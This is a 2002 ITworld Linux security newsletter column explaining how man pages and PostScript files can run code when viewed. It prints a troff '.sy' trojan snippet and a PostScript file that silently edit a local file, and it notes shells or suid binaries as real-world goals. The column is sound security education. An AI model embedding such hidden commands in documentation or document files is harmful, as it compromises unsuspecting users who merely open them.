--- Begin Message --- Title: Executing Code From Non-executable Files
LINUX SECURITY --- August 27, 2002
Published by ITworld.com -- changing the way you view IT
http://www.itworld.com/newsletters
________________________________________________________________________________HIGHLIGHTS
* With a little creativity and effort, those innocuous looking, non-
executable file formats may be made more dangerous than they appear.SERVICES
* Webcast: Ping. Ping. Ping.
* Webcast: Strategies for Building Business-critical VPN
________________________________________________________________________________SPONSORED LINK
ACHIEVE WORLD-CLASS PERFORMANCE IN YOUR HELP DESK!
Learn how the best help desks operate and how they overcome resource
constraints, consistently deliver highly valued service, and exceed
customer expectations. Help Desk Best Practices Forum. September 23-24.http://itw.itworld.com/GoNow/a14724a63421a102359357a0
______________________________________________________________________________Executing Code From Non-executable Files
By Brian HatchWe're all told about the hazards of running untrusted executables. If a
friend sends you the latest greatest program, can you be sure that it
was him as opposed to someone forging the email address? Or perhaps it's
a virus/worm. Or perhaps your friend is just malicious and wants you to
run a program that has 'rm -rf /' in it.What some may not realize is that some non-executable file formats have
the potential to run malicious code. A few weeks ago I challenged folks
to create a file that, when viewed with a standard tool, would be able
to perform system actions. In this case, the payload should take the
file 'modifyme' and delete the first four bytes. In real life, you'd
expect something more interesting, such as binding a network-accessible
shell, or creating a suid binary.The first one we'll look at is a man page. Man pages are usually stored
in directories such as /usr/man/ or /usr/share/man in a macro language
that is readable by troff. For example, on my system, the source to the
p0f man page looks like this:.TH P0F 1
.\" NAME should be all caps, SECTION should be 1-8, maybe w/
subsection
.\" other parms are allowed: see man(7), man(1)
.SH NAME
p0f \- identify remote systems passively
.SH SYNOPSIS
.B p0f
.I "[ -f file ] [ -i device ] [ -o file ] [ -s file ] [ -vKUtq ] [
'filter rule' ]"
.br
.SH "DESCRIPTION"
This manual page briefly documents the
.BR p0f
command.
...It is stored in /usr/share/man/man1/p0f.1 so when you type 'man p0f', it
runs this file through various parsing programs and, in the end, shows
you a readable version like this:P0F(1) P0F(1)
NAME
p0f - identify remote systems passivelySYNOPSIS
p0f [ -f file ] [ -i device ] [ -o file ] [ -s file ] [
-vKUtq ] [ 'filter rule' ]DESCRIPTION
This manual page briefly documents the p0f command.
...One of the parsers invoked by man is troff. All those lines beginning
with '.' are troff macros, which are used to specify indentation,
boldness, and such. It's an ancient language, created eons before HTML.
In addition to the formatting options, there are a couple macro requests
that allow you to run commands. The easiest is the '.sy' option. To make
the p0f strip the leading four bytes from the file, we just add the
following to the p0f.1 file:.sy dd if=modifyme of=modifyme.tmp ibs=4 skip=1 >/dev/null 2>&1
.sy mv modifyme.tmp modifyme >/dev/null 2>&1The text after the .sy macro is run by troff during the man page
formatting process, in this case editing the modifyme file using dd. The
next time you run 'man p0f' you'll be silently running the code hidden
in the manual page.Think of how many pieces of third party software you've installed, many
of which come with manual pages. If you had time to vet the source code,
did you even think of looking at the man pages for hidden trojans like
this one? Probably not.Luckily, GNU's troff, which is what is used on Linux systems, disables
unsafe macros by automatically including the 'safer' macro file. This
file read unless you explicitly include '-U' on the troff command line.
So, since 'man' does not do this, you are safe. All of the unsafe troff
commands (open opena pso sy pi) are disabled by default.Unfortunately, this isn't the case with other Unix systems. My Solaris 8
host, for example, is still vulnerable to this simple trick.Next, let's look at another example, a PostScript file. Just like man
pages, PostScript is more powerful than you might imagine. In addition
to its ability to define a viewable/printable page, it has block and
loop control structures, the ability to open and close files,
read/write, process input, etc.... It's powerful enough that a Web
server [1] has even been written using nothing but PostScript.So, let's take a look at a simple PostScript file, stripfourbytes.ps:
%!
% Define a few file handles
/stdout (%stdout) (w) file def
% Open our input and output files.
% Can't get easier than this.
(modifyme) /input exch (r) file def
(modifyme.out) /output exch (w) file def
% strip those four bytes
/fourbytes 4 string def
input fourbytes readstring
/buffer 1024 string def
{
input buffer readstring
{ output exch writestring }
{ output exch writestring input closefile exit } ifelse
} bind loop
stdout (You have been cracked.\n) writestring
quitRather than using any external programs, I wrote this to be
self-contained. To execute it, you simply need to 'view' the PostScript
file with 'gs stripfourbytes.ps'.Luckily, ghostscript (gs) is usually not the default PostScript viewer.
Ghostview only allows vanilla PostScript document viewing capabilities,
not the ability to open arbitrary files.Congratulations go out to Michael Metheringham for coming up with a
trojaned PostScript file and Gina Vancura for creating a trojaned man
page. Also, Andrew Klaassen came up with a man page example [2] that,
though it did not contain any exploit, was certainly the funniest thing
I'd seen in a long time.Thus far, no one has attempted to embed such an exploit into a LaTeX,
PDF, or image file, but I'll leave the challenge open to anyone who
wants to try. I have never tried so I don't know offhand if they're
possible. I'd think one in LaTeX should be possible, but PDF and
graphics are likely out of the running.
NOTES
[1] http://itw.itworld.com/GoNow/a14724a63421a102359357a8 written by Anders Karlsson.
[2] http://itw.itworld.com/GoNow/a14724a63421a102359357a1________________________________________________________________________________
SPONSORED LINK
WEBCAST: ROI FOR PUBLIC KEY INFRASTRUCTURE (PKI)
Tune in and learn more about the two major enterprise technology
transitions that contribute to the ROI of PKI. Examples will include
eliminating paper-based business processes and enabling web based
application integration.http://itw.itworld.com/GoNow/a14724a63421a102359357a4
________________________________________________________________________________
About the author(s)
-------------------
Brian Hatch is Chief Hacker at Onsight, Inc, and author of Hacking
Linux Exposed and Building Linux VPNs. He once wrote the PostScript
version of his resume from top to bottom using nothing but vi. He's
happy to say he doesn't remember PostScript that well any more. Brian
can be reached at [EMAIL PROTECTED]
________________________________________________________________________________ITWORLD.COM NEWSLETTER ARCHIVE
Index of Linux Security
http://itw.itworld.com/GoNow/a14724a63421a102359357a7Users Seek Online Security, Shirk Cumbersome Passwords
http://itw.itworld.com/GoNow/a14724a63421a102359357a5Everyone Needs Backup
http://itw.itworld.com/GoNow/a14724a63421a102359357a6
________________________________________________________________________________ITWORLD.COM SERVICES
PING. PING. PING.
That's the sound of a hacker trying to attack your network. Don't let
one weak spot ruin a perfectly good defense. Watch this FREE webcast and
hear about tamper-resistant distributed security solutions for your
network.http://itw.itworld.com/GoNow/a14724a63421a102359357a3
STRATEGIES FOR BUILDING BUSINESS-CRITICAL VPNs
This webcast will allow you to properly address network security
concerns, while reliably serving your remote users using a virtual
private network (VPN). Learn about the benefits of VPNs, and the
strategies for seamless VPN integration. Sponsored By Sprint.http://itw.itworld.com/GoNow/a14724a63421a102359357a2
________________________________________________________________________________
CUSTOMER SERVICE
SUBSCRIBE/UNSUBSCRIBE:
- Go to: http://www.itworld.com/newsletters
- Click on "View my newsletters" to log in and manage your account
- To subscribe, check the box next to the newsletter
- To unsubscribe, uncheck the box next to the newsletter
- When finished, click submitQuestions? Please e-mail customer service at: mailto:[EMAIL PROTECTED]
________________________________________________________________________________CONTACTS
* Editorial: Andrew Santosusso, Newsletter Editor,
[EMAIL PROTECTED]
* Advertising: Clare O'Brien, Vice President of Sales,
[EMAIL PROTECTED]
* Career Corner: Janis Crowley, Vice President/General Manager, IDG
Recruitment Solutions, [EMAIL PROTECTED]
* Other inquiries: Jodie Naze, Senior Product Marketing Manager,
[EMAIL PROTECTED]________________________________________________________________________________
PRIVACY POLICY
ITworld.com has been TRUSTe certified
http://www.itworld.com/Privacy/Copyright 2002 ITworld.com, Inc., All Rights Reserved.
http://www.itworld.com
Click here to forward this message to a friend!
http://itw.itworld.com/GoForward/a14724a63421aSa102359357a17SUBSCRIBE/UNSUBSCRIBE
Please click on the link below to modify your subscription, unsubscribe,
or change your email address:http://itw.itworld.com/Change-Remove/a14724a102359357a17a63421
--- End Message ---
